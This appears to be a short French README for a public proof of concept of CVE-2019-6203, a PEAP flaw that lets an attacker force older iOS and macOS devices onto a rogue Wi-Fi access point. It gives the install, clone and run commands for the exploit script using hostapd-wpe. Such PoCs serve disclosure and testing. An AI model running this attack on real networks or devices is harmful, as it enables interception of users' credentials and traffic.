
PoC pour CVE-2019-6203, fonctionne sur < iOS 12.2, macOS < 10.14.4
Il y a un bug PEAP dans tous les appareils Apple qui permettrait à un attaquant de forcer n'importe quel appareil Apple (iOS, macOS ou tvOS) à s'associer à un point d'accès malveillant.
Ceci est une preuve de concept (PoC) pour CVE-2019-6203, fonctionne sur iOS < 12.2, macOS < 10.14.4, testé sur Kali Linux.
Vous avez besoin d'une carte Wi-Fi prenant en charge le mode AP pour exécuter cette PoC. Vous pouvez vérifier cela en exécutant iw list, qui affiche des informations comme :
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#with Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0
Vidéo : https://youtu.be/UEzdtkcnrYw